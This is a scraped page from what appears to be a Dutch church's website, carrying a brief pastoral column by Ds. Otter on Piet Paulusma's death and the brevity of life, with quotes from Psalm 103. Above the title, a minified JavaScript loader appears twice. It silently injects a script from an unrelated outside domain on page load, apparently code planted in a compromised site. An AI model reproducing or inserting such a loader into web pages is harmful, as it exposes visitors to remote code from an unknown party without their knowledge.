;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Piet Paulusma - PKN Damwâld

Piet Paulusma

Gepubliceerd op: vrijdag 25 maart 2022

Op zondag 20 maart overleed Piet Paulusma. Na al zijn weerberichten kwam er een einde zijn vertrouwde stem. Bij het weernieuws dat voor velen misschien wel het belangrijkste is van alle nieuwsberichten ontbreekt een pijler en we missen hem.

Ons leven is maar beperkt. De schokkende berichten uit de Oekraïne en andere onzekere berichten kunnen ons bezorgd maken. Hoe zien de komende maanden eruit? In Psalm 103 schrijft David: “De mens – zijn dagen zijn als het gras, hij is als een bloem die bloeit op het veld en verdwijnt zodra de wind hem verzengt; de plek waar hij stond, kent hem niet meer. Maar de HEER is trouw aan wie hem vrezen, van eeuwigheid tot eeuwigheid” (vers 15vv). Laten we ons toevertrouwen aan Jezus Christus, Die Zijn leven voor ons gaf. “Die wolken, lucht en winden wijst spoor en loop en baan, zal ook wel wegen vinden, waarlangs uw voet kan gaan” (LvdK 427).  Hij is meer dan een hemelse Weerman. Ons leven is veilig in Zijn hand.

Columnist:Ds. Otter

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns